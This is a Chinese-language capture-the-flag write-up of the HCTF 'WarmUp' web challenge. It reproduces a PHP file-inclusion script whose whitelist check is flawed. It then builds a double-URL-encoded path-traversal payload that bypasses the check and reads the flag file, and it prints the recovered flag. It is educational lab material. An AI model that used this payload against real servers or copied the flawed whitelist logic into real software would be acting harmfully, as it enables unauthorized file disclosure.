难度系数: ★★
题目来源: HCTF
题目描述: 暂无
题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样)
1、点击链接进入如下界面
2、查看源代码(按F12或F12+Fn),出现以下代码。
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title>
</head>
<body><!--source.php--><br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
3、发现了“source.php”
则在链接后面加上“/source.php”
既是http://220.249.52.133:38343/source.php
4、输入URL之后,跳出以下信息
<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}
?>
5、发现了关键信息
$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];
6、在链接后加上/hint.php
URL: http://220.249.52.133:38343/hint.php
7、输入URL,出现以下信息
8、然后构造payload
?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg
这样也可以,等等!
9、找到flag
10、OK
flag{25e7bce6005c4e0c983fb97297ac6e5a}